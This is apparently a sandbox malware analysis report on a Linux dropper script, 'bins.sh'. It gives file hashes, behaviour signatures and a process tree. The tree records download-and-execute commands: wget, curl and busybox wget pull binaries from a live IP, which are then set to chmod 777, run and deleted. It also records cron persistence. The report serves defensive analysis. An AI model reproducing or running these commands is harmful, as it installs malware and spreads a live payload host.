Analysis
-
max time kernel
21s -
max time network
37s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
26-10-2024 22:42
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
788455780ea094018314d177b06bc6c7
-
SHA1
fed4c714293cf21d947da11f6557ae8cce17071e
-
SHA256
5b5aa6bdfc62a9584cda1474c4efc2a79fdc2884dead583f0d69a48f6ec3f0ae
-
SHA512
1de55f8859f0485b63139e06e216a92450efe26dc5d88c1b20519fc913c8eade2688731866a4d8756a4f72f6af8dd04d20283815939fbd6844727991d31c4c9a
-
SSDEEP
96:FaR6l656DwojG1uGROuSbaqI0R0bR6l656Dwol7UVG1uGR25uSbaqbJYTBCTbIH:FaMI0DwopuSbaqI0R0YI0DwowuSbaqo
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid process 804 chmod 817 chmod 836 chmod 842 chmod 692 chmod 761 chmod 791 chmod 775 chmod 824 chmod 830 chmod 674 chmod 712 chmod 732 chmod -
Executes dropped EXE 13 IoCs
Processes:
ue0HMQfDUAuKUjvMvFt0pZSoWxKYtvl1geQTLnfqoTH4FpUHoi6oqZzXpAYPVBGniwo1KnTTDDsvNxSydYgPidAurYS9baJBODz0rdlwWFxGnIqb6lVYw9XwbGTtA53T3InxRTtepia9SqAhobLB6sV28XTR8A2R1BpRELp7R57u8nqOHZAvrHrXdIDLqyjyCenA8YVIAU7ApNlBEqxrjLGc4A6DEkH73g1YikCn0ZrApeiUzb9lwHhCriwGMc3DuLJUUaXmXATXAf9E4V1BfrZcZ8THdClYvlWCXihfTEv5W1IqLcUlgfAciMQ6HgMDVHiREEJlfT69xEYicP3FTJgBY3cNiM2Z2YD7iuzFEsRFZGJTKex9X2oMmMEr9YEuICy22TotPoPIM4nXyXI7tZVARsrhPSvkdtNAGC92ka9ac6lG6GMDay81lvioc pid process /tmp/ue0HMQfDUAuKUjvMvFt0pZSoWxKYtvl1ge 675 ue0HMQfDUAuKUjvMvFt0pZSoWxKYtvl1ge /tmp/QTLnfqoTH4FpUHoi6oqZzXpAYPVBGniwo1 693 QTLnfqoTH4FpUHoi6oqZzXpAYPVBGniwo1 /tmp/KnTTDDsvNxSydYgPidAurYS9baJBODz0rd 713 KnTTDDsvNxSydYgPidAurYS9baJBODz0rd /tmp/lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte 734 lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte /tmp/pia9SqAhobLB6sV28XTR8A2R1BpRELp7R5 763 pia9SqAhobLB6sV28XTR8A2R1BpRELp7R5 /tmp/7u8nqOHZAvrHrXdIDLqyjyCenA8YVIAU7A 777 7u8nqOHZAvrHrXdIDLqyjyCenA8YVIAU7A /tmp/pNlBEqxrjLGc4A6DEkH73g1YikCn0ZrApe 792 pNlBEqxrjLGc4A6DEkH73g1YikCn0ZrApe /tmp/iUzb9lwHhCriwGMc3DuLJUUaXmXATXAf9E 806 iUzb9lwHhCriwGMc3DuLJUUaXmXATXAf9E /tmp/4V1BfrZcZ8THdClYvlWCXihfTEv5W1IqLc 818 4V1BfrZcZ8THdClYvlWCXihfTEv5W1IqLc /tmp/UlgfAciMQ6HgMDVHiREEJlfT69xEYicP3F 825 UlgfAciMQ6HgMDVHiREEJlfT69xEYicP3F /tmp/TJgBY3cNiM2Z2YD7iuzFEsRFZGJTKex9X2 831 TJgBY3cNiM2Z2YD7iuzFEsRFZGJTKex9X2 /tmp/oMmMEr9YEuICy22TotPoPIM4nXyXI7tZVA 837 oMmMEr9YEuICy22TotPoPIM4nXyXI7tZVA /tmp/RsrhPSvkdtNAGC92ka9ac6lG6GMDay81lv 843 RsrhPSvkdtNAGC92ka9ac6lG6GMDay81lv -
Renames itself 1 IoCs
Processes:
lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTtepid process 736 lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc process File opened for modification /var/spool/cron/crontabs/tmp.WoET3e crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 10 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Processes:
lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTtecurlcurlcurlcurlcrontabcurlcrontabcurldescription ioc process File opened for reading /proc/641/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/813/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/822/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/self/auxv curl File opened for reading /proc/590/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/776/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/22/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/716/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/207/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/754/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/12/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/27/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/643/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/790/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/833/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/6/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/26/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/788/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/789/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/5/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/314/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/748/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/15/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/105/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/filesystems crontab File opened for reading /proc/42/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/146/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/585/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/784/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/785/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/835/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/267/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/782/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/797/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/834/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/self/auxv curl File opened for reading /proc/13/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/800/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/3/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/300/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/640/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/648/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/19/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/24/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/7/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/96/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/758/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/767/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/768/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/filesystems crontab File opened for reading /proc/138/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/780/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/839/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/18/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/751/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/783/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte File opened for reading /proc/809/cmdline lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte -
Writes file to tmp directory 21 IoCs
Malware often drops required files in the /tmp directory.
Processes:
busyboxbusyboxbusyboxbusyboxbusyboxbusyboxcurlwgetcurlbusyboxwgetbusyboxbusyboxcurlwgetcurlbusyboxbusyboxbusyboxbusyboxwgetdescription ioc process File opened for modification /tmp/pNlBEqxrjLGc4A6DEkH73g1YikCn0ZrApe busybox File opened for modification /tmp/TJgBY3cNiM2Z2YD7iuzFEsRFZGJTKex9X2 busybox File opened for modification /tmp/RsrhPSvkdtNAGC92ka9ac6lG6GMDay81lv busybox File opened for modification /tmp/QTLnfqoTH4FpUHoi6oqZzXpAYPVBGniwo1 busybox File opened for modification /tmp/7u8nqOHZAvrHrXdIDLqyjyCenA8YVIAU7A busybox File opened for modification /tmp/iUzb9lwHhCriwGMc3DuLJUUaXmXATXAf9E busybox File opened for modification /tmp/ue0HMQfDUAuKUjvMvFt0pZSoWxKYtvl1ge curl File opened for modification /tmp/QTLnfqoTH4FpUHoi6oqZzXpAYPVBGniwo1 wget File opened for modification /tmp/KnTTDDsvNxSydYgPidAurYS9baJBODz0rd curl File opened for modification /tmp/KnTTDDsvNxSydYgPidAurYS9baJBODz0rd busybox File opened for modification /tmp/lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte wget File opened for modification /tmp/lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte busybox File opened for modification /tmp/ue0HMQfDUAuKUjvMvFt0pZSoWxKYtvl1ge busybox File opened for modification /tmp/QTLnfqoTH4FpUHoi6oqZzXpAYPVBGniwo1 curl File opened for modification /tmp/KnTTDDsvNxSydYgPidAurYS9baJBODz0rd wget File opened for modification /tmp/lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte curl File opened for modification /tmp/pia9SqAhobLB6sV28XTR8A2R1BpRELp7R5 busybox File opened for modification /tmp/4V1BfrZcZ8THdClYvlWCXihfTEv5W1IqLc busybox File opened for modification /tmp/UlgfAciMQ6HgMDVHiREEJlfT69xEYicP3F busybox File opened for modification /tmp/oMmMEr9YEuICy22TotPoPIM4nXyXI7tZVA busybox File opened for modification /tmp/ue0HMQfDUAuKUjvMvFt0pZSoWxKYtvl1ge wget
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:643
-
/bin/rm/bin/rm bins.sh2⤵PID:645
-
/usr/bin/wgetwget http://87.120.126.196/bins/ue0HMQfDUAuKUjvMvFt0pZSoWxKYtvl1ge2⤵
- Writes file to tmp directory
PID:647 -
/usr/bin/curlcurl -O http://87.120.126.196/bins/ue0HMQfDUAuKUjvMvFt0pZSoWxKYtvl1ge2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:662 -
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ue0HMQfDUAuKUjvMvFt0pZSoWxKYtvl1ge2⤵
- Writes file to tmp directory
PID:671 -
/bin/chmodchmod 777 ue0HMQfDUAuKUjvMvFt0pZSoWxKYtvl1ge2⤵
- File and Directory Permissions Modification
PID:674 -
/tmp/ue0HMQfDUAuKUjvMvFt0pZSoWxKYtvl1ge./ue0HMQfDUAuKUjvMvFt0pZSoWxKYtvl1ge2⤵
- Executes dropped EXE
PID:675 -
/bin/rmrm ue0HMQfDUAuKUjvMvFt0pZSoWxKYtvl1ge2⤵PID:677
-
/usr/bin/wgetwget http://87.120.126.196/bins/QTLnfqoTH4FpUHoi6oqZzXpAYPVBGniwo12⤵
- Writes file to tmp directory
PID:678 -
/usr/bin/curlcurl -O http://87.120.126.196/bins/QTLnfqoTH4FpUHoi6oqZzXpAYPVBGniwo12⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:680 -
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/QTLnfqoTH4FpUHoi6oqZzXpAYPVBGniwo12⤵
- Writes file to tmp directory
PID:689 -
/bin/chmodchmod 777 QTLnfqoTH4FpUHoi6oqZzXpAYPVBGniwo12⤵
- File and Directory Permissions Modification
PID:692 -
/tmp/QTLnfqoTH4FpUHoi6oqZzXpAYPVBGniwo1./QTLnfqoTH4FpUHoi6oqZzXpAYPVBGniwo12⤵
- Executes dropped EXE
PID:693 -
/bin/rmrm QTLnfqoTH4FpUHoi6oqZzXpAYPVBGniwo12⤵PID:695
-
/usr/bin/wgetwget http://87.120.126.196/bins/KnTTDDsvNxSydYgPidAurYS9baJBODz0rd2⤵
- Writes file to tmp directory
PID:697 -
/usr/bin/curlcurl -O http://87.120.126.196/bins/KnTTDDsvNxSydYgPidAurYS9baJBODz0rd2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:701 -
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/KnTTDDsvNxSydYgPidAurYS9baJBODz0rd2⤵
- Writes file to tmp directory
PID:708 -
/bin/chmodchmod 777 KnTTDDsvNxSydYgPidAurYS9baJBODz0rd2⤵
- File and Directory Permissions Modification
PID:712 -
/tmp/KnTTDDsvNxSydYgPidAurYS9baJBODz0rd./KnTTDDsvNxSydYgPidAurYS9baJBODz0rd2⤵
- Executes dropped EXE
PID:713 -
/bin/rmrm KnTTDDsvNxSydYgPidAurYS9baJBODz0rd2⤵PID:717
-
/usr/bin/wgetwget http://87.120.126.196/bins/lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte2⤵
- Writes file to tmp directory
PID:718 -
/usr/bin/curlcurl -O http://87.120.126.196/bins/lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:724 -
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte2⤵
- Writes file to tmp directory
PID:730 -
/bin/chmodchmod 777 lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte2⤵
- File and Directory Permissions Modification
PID:732 -
/tmp/lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte./lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:734 -
/bin/shsh -c "crontab -l"3⤵PID:737
-
/usr/bin/crontabcrontab -l4⤵
- Reads runtime system information
PID:738 -
/bin/shsh -c "crontab -"3⤵PID:742
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
- Reads runtime system information
PID:743 -
/bin/rmrm lwWFxGnIqb6lVYw9XwbGTtA53T3InxRTte2⤵PID:751
-
/usr/bin/wgetwget http://87.120.126.196/bins/pia9SqAhobLB6sV28XTR8A2R1BpRELp7R52⤵PID:756
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/pia9SqAhobLB6sV28XTR8A2R1BpRELp7R52⤵PID:757
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/pia9SqAhobLB6sV28XTR8A2R1BpRELp7R52⤵
- Writes file to tmp directory
PID:758 -
/bin/chmodchmod 777 pia9SqAhobLB6sV28XTR8A2R1BpRELp7R52⤵
- File and Directory Permissions Modification
PID:761 -
/tmp/pia9SqAhobLB6sV28XTR8A2R1BpRELp7R5./pia9SqAhobLB6sV28XTR8A2R1BpRELp7R52⤵
- Executes dropped EXE
PID:763 -
/bin/rmrm pia9SqAhobLB6sV28XTR8A2R1BpRELp7R52⤵PID:765
-
/usr/bin/wgetwget http://87.120.126.196/bins/7u8nqOHZAvrHrXdIDLqyjyCenA8YVIAU7A2⤵PID:767
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/7u8nqOHZAvrHrXdIDLqyjyCenA8YVIAU7A2⤵
- Checks CPU configuration
- Reads runtime system information
PID:768 -
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/7u8nqOHZAvrHrXdIDLqyjyCenA8YVIAU7A2⤵
- Writes file to tmp directory
PID:771 -
/bin/chmodchmod 777 7u8nqOHZAvrHrXdIDLqyjyCenA8YVIAU7A2⤵
- File and Directory Permissions Modification
PID:775 -
/tmp/7u8nqOHZAvrHrXdIDLqyjyCenA8YVIAU7A./7u8nqOHZAvrHrXdIDLqyjyCenA8YVIAU7A2⤵
- Executes dropped EXE
PID:777 -
/bin/rmrm 7u8nqOHZAvrHrXdIDLqyjyCenA8YVIAU7A2⤵PID:779
-
/usr/bin/wgetwget http://87.120.126.196/bins/pNlBEqxrjLGc4A6DEkH73g1YikCn0ZrApe2⤵PID:780
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/pNlBEqxrjLGc4A6DEkH73g1YikCn0ZrApe2⤵
- Checks CPU configuration
PID:784 -
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/pNlBEqxrjLGc4A6DEkH73g1YikCn0ZrApe2⤵
- Writes file to tmp directory
PID:787 -
/bin/chmodchmod 777 pNlBEqxrjLGc4A6DEkH73g1YikCn0ZrApe2⤵
- File and Directory Permissions Modification
PID:791 -
/tmp/pNlBEqxrjLGc4A6DEkH73g1YikCn0ZrApe./pNlBEqxrjLGc4A6DEkH73g1YikCn0ZrApe2⤵
- Executes dropped EXE
PID:792 -
/bin/rmrm pNlBEqxrjLGc4A6DEkH73g1YikCn0ZrApe2⤵PID:794
-
/usr/bin/wgetwget http://87.120.126.196/bins/iUzb9lwHhCriwGMc3DuLJUUaXmXATXAf9E2⤵PID:796
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/iUzb9lwHhCriwGMc3DuLJUUaXmXATXAf9E2⤵PID:798
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/iUzb9lwHhCriwGMc3DuLJUUaXmXATXAf9E2⤵
- Writes file to tmp directory
PID:801 -
/bin/chmodchmod 777 iUzb9lwHhCriwGMc3DuLJUUaXmXATXAf9E2⤵
- File and Directory Permissions Modification
PID:804 -
/tmp/iUzb9lwHhCriwGMc3DuLJUUaXmXATXAf9E./iUzb9lwHhCriwGMc3DuLJUUaXmXATXAf9E2⤵
- Executes dropped EXE
PID:806 -
/bin/rmrm iUzb9lwHhCriwGMc3DuLJUUaXmXATXAf9E2⤵PID:809
-
/usr/bin/wgetwget http://87.120.126.196/bins/4V1BfrZcZ8THdClYvlWCXihfTEv5W1IqLc2⤵PID:810
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/4V1BfrZcZ8THdClYvlWCXihfTEv5W1IqLc2⤵PID:812
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/4V1BfrZcZ8THdClYvlWCXihfTEv5W1IqLc2⤵
- Writes file to tmp directory
PID:815 -
/bin/chmodchmod 777 4V1BfrZcZ8THdClYvlWCXihfTEv5W1IqLc2⤵
- File and Directory Permissions Modification
PID:817 -
/tmp/4V1BfrZcZ8THdClYvlWCXihfTEv5W1IqLc./4V1BfrZcZ8THdClYvlWCXihfTEv5W1IqLc2⤵
- Executes dropped EXE
PID:818 -
/bin/rmrm 4V1BfrZcZ8THdClYvlWCXihfTEv5W1IqLc2⤵PID:820
-
/usr/bin/wgetwget http://87.120.126.196/bins/UlgfAciMQ6HgMDVHiREEJlfT69xEYicP3F2⤵PID:821
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/UlgfAciMQ6HgMDVHiREEJlfT69xEYicP3F2⤵
- Checks CPU configuration
- Reads runtime system information
PID:822 -
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/UlgfAciMQ6HgMDVHiREEJlfT69xEYicP3F2⤵
- Writes file to tmp directory
PID:823 -
/bin/chmodchmod 777 UlgfAciMQ6HgMDVHiREEJlfT69xEYicP3F2⤵
- File and Directory Permissions Modification
PID:824 -
/tmp/UlgfAciMQ6HgMDVHiREEJlfT69xEYicP3F./UlgfAciMQ6HgMDVHiREEJlfT69xEYicP3F2⤵
- Executes dropped EXE
PID:825 -
/bin/rmrm UlgfAciMQ6HgMDVHiREEJlfT69xEYicP3F2⤵PID:826
-
/usr/bin/wgetwget http://87.120.126.196/bins/TJgBY3cNiM2Z2YD7iuzFEsRFZGJTKex9X22⤵PID:827
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TJgBY3cNiM2Z2YD7iuzFEsRFZGJTKex9X22⤵
- Checks CPU configuration
PID:828 -
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TJgBY3cNiM2Z2YD7iuzFEsRFZGJTKex9X22⤵
- Writes file to tmp directory
PID:829 -
/bin/chmodchmod 777 TJgBY3cNiM2Z2YD7iuzFEsRFZGJTKex9X22⤵
- File and Directory Permissions Modification
PID:830 -
/tmp/TJgBY3cNiM2Z2YD7iuzFEsRFZGJTKex9X2./TJgBY3cNiM2Z2YD7iuzFEsRFZGJTKex9X22⤵
- Executes dropped EXE
PID:831 -
/bin/rmrm TJgBY3cNiM2Z2YD7iuzFEsRFZGJTKex9X22⤵PID:832
-
/usr/bin/wgetwget http://87.120.126.196/bins/oMmMEr9YEuICy22TotPoPIM4nXyXI7tZVA2⤵PID:833
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/oMmMEr9YEuICy22TotPoPIM4nXyXI7tZVA2⤵
- Checks CPU configuration
PID:834 -
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/oMmMEr9YEuICy22TotPoPIM4nXyXI7tZVA2⤵
- Writes file to tmp directory
PID:835 -
/bin/chmodchmod 777 oMmMEr9YEuICy22TotPoPIM4nXyXI7tZVA2⤵
- File and Directory Permissions Modification
PID:836 -
/tmp/oMmMEr9YEuICy22TotPoPIM4nXyXI7tZVA./oMmMEr9YEuICy22TotPoPIM4nXyXI7tZVA2⤵
- Executes dropped EXE
PID:837 -
/bin/rmrm oMmMEr9YEuICy22TotPoPIM4nXyXI7tZVA2⤵PID:838
-
/usr/bin/wgetwget http://87.120.126.196/bins/RsrhPSvkdtNAGC92ka9ac6lG6GMDay81lv2⤵PID:839
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RsrhPSvkdtNAGC92ka9ac6lG6GMDay81lv2⤵
- Checks CPU configuration
- Reads runtime system information
PID:840 -
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RsrhPSvkdtNAGC92ka9ac6lG6GMDay81lv2⤵
- Writes file to tmp directory
PID:841 -
/bin/chmodchmod 777 RsrhPSvkdtNAGC92ka9ac6lG6GMDay81lv2⤵
- File and Directory Permissions Modification
PID:842 -
/tmp/RsrhPSvkdtNAGC92ka9ac6lG6GMDay81lv./RsrhPSvkdtNAGC92ka9ac6lG6GMDay81lv2⤵
- Executes dropped EXE
PID:843 -
/bin/rmrm RsrhPSvkdtNAGC92ka9ac6lG6GMDay81lv2⤵PID:845
-
/usr/bin/wgetwget http://87.120.126.196/bins/0FwIvrWL8fqJXFPAFZTKwj8B0WfoaotDBP2⤵PID:846
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
101KB
MD58d0f8d45165dc1f3ba334ce75be39621
SHA11d5baece9d5af3885276735c3c20d28e161e00ff
SHA25617441ed8bf165953a69907fb286dd47f2de3f94b744da25c889f86514b904791
SHA512a8b032ce95f8a70b8c8c0b60b711d379706938c571bcb5cfd7fd16dac64c7d005987169abfd5d0d53b2e1da14eb1bd24cf913c7202f5855a9e4f0d80ce86f5e7
-
Filesize
129KB
MD554bec959d900ad930dc662f8092da57d
SHA19ae7ad9018eeac5aa89bcde68ec683a364ac7d55
SHA256b62a7cb65dda1cb1ae995b13b62d20289f43b7bc560211484cfdc98c0d9b5f12
SHA512904a52a1d41d442da07333f9835bb0b1bfcefe9790a566d3b8e03d62e0c788d10b0e17b05865798b1817615b3adb07adfcb13452d96aacf5995b66fae617db40
-
Filesize
84KB
MD564ece99ca4ab1c1405f5a3335d64a960
SHA1b7395f2320a5bdadb78943b268708965cdbd1d74
SHA256aaf14287d7a971d4541527262e85e5930bbb7f506cff4808d712843be9f05dae
SHA512bc169075e50ceffd0ce0cc90513bc2f0d8696c01d4132609e31c782ea6c0a755505891e2e23676dd63c3dd00bf97599a9a7e6230e8c3f5166202f5b9be606d41
-
Filesize
93KB
MD58fad5e89ce3d2b6159ac2ce2fdf7c084
SHA127105a304b9bb7cd8a663d1b4da1d92fd8eea355
SHA25624689f385c263c42a28dd1498049171abc633faf91b5df2a738a81145d929bd6
SHA51271689ade77c0ad2ca2db18ed4fd437b6a053b002efadbf6fb479e4f5c85a7830dc0e9cbfef877ca7a91c735a68f28226e7c813c05b329c23668de7edbc99f4bc
-
Filesize
93KB
MD527a1a1941f224eff6a4babf2495e3692
SHA186fae66a698f6280353e470ffadfb64441b03e83
SHA256ab610b9f57ce293287cf9d4b3d47024ee73c81d8542247e26d1f0db2d5144179
SHA512cf02927d9313f43ab5d04c7570b71cd722a5772642eac72feccdf4612985e29b399a7bbdff5de65d352b92f168c6934b0f0851a28c58a4814fffe38a0d884934
-
Filesize
158KB
MD5d8e96e2fdd3c610ec19128e18de5abde
SHA110cf691ae9779bfeca8b67e75721d0a6f275e4f9
SHA256f09f8db2883da603f963189ef3b8185b179832de8b2e526ef63fe8b96847cc7b
SHA512979e0f29d7b65fcf7c4d93ec6fdaa70cdd26d9fa8a526fee7d4cdb028229db06186f89c9b0c93d3112e636c1b65819d46695310c90a1700343c2221df9323592
-
Filesize
122KB
MD5aadb8cc4b6eac7fce760c09262693884
SHA1b55178ff3605f4bbfc9286d4c8ac445673232217
SHA256b254f9a6df1e7aae5181abf014b9d574c959ab71bdfd3a2b21022446c583d843
SHA5125567998215fc9389efeb34ee57e59db4141044bbb1f06cac365565681226836b515c8c8cc17931e72e71d4240a5f433aebb8dfe67b2463ef800f59c86561a62c
-
Filesize
88KB
MD5e9e5d79acad49bbe6c77df0385ec77aa
SHA153bbc8b58873cf3117743fab15bd5508421370eb
SHA256a585eff62bec554d3d7f23aaf9b298a15eb328e8968352339db915ef427f27bd
SHA512828680ef393890f3c8805527a473f018b212fa1d6c8534fc03bb34f910de4b8d1cd5ce3cef2c06396f225a61794205a61d9fdc6847b14ebd6d7267af9f38f381
-
Filesize
100KB
MD53b78bb645b81d600c30713d416f666be
SHA123796112f2cce2afb2217498b5ecf2801ab550f2
SHA256d52f8bcb15a590aa5624c446091f1cd0705b68e4647debaeecf8cfa1fe425bd2
SHA5129532ede2d78f1f62f291c8d8d4023c9c579a0bdd042ca11af179adcab96ac2eb178ecb34b9e4b99a33f828694b9839abebabd2ef57dd36d1936027bad1987cf9
-
Filesize
108KB
MD5c97a9c55ddb153e8bfce38f201d2cffb
SHA13970452f27327f98c2e3fdcabf0390067b48bd62
SHA256138a80e023ab0bbb8b2259cf3633c94c39e6f68df2be2ad01ef08590249e662c
SHA5121734a2e256f90d99d73c70d0faa5b3d24d39a2e9a60dec0c138e75ae0e1793edafb408e1f2aaa2692f40265183faea1d4141b271fb67543633a412817f9fd11e
-
Filesize
101KB
MD5a7e686eb3f74b104a5520f08cfd54eb5
SHA158b5d9571c85c6a7efc4e57111c3b8e2b2c9bb6b
SHA256617734b61c7e230a72fba8cb8b361bda96cc2d8f40ee358c44a60f1d9b48ab07
